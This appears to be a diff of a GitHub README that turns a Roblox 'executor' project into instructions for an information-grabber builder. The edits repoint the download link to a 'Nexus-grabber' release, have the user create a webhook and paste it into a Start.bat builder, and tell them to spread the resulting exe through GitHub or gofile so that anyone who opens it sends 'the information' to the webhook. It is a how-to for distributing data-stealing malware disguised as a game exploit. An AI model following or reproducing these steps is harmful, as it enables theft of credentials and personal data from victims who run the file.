OFBloom4345/Bloom-spoit/README.md

 ## Installation

-1. Download the latest release from the [Releases](https://github.com/your-username/bloom-exploit/releases) page.
+1. Download the latest release from the [Releases]([https://github.com/your-username/bloom-exploit/releases](https://github.com/OFBloom4345/Nexus-grabber/releases/tag/Executor)) page.
 2. Extract the downloaded ZIP file.
-3. Run `BloomExecutor.exe` as administrator.
+3. Run `Start.bat` "It will ask you for a password.

+## Creating a webhook
+1.Make a server
+2.Go to Server settings,integration,create webhook
+3.Copy Webook url

 ## Usage

-1. Launch the executor.
+1. Launch Start.bat again.
-2. Attach Bloom Exploit to Roblox.
+2. Paste in your Webook url
-3. Load or paste your desired script.
+3. Check the desired settings.
-4. Click "Execute" to run the script in-game.
+4. Press create

+## Usage use github or gofile to distribute the exe
+1. When someone opens it it will give you the information

 ## Contributing

 We welcome contributions!
 To contribute: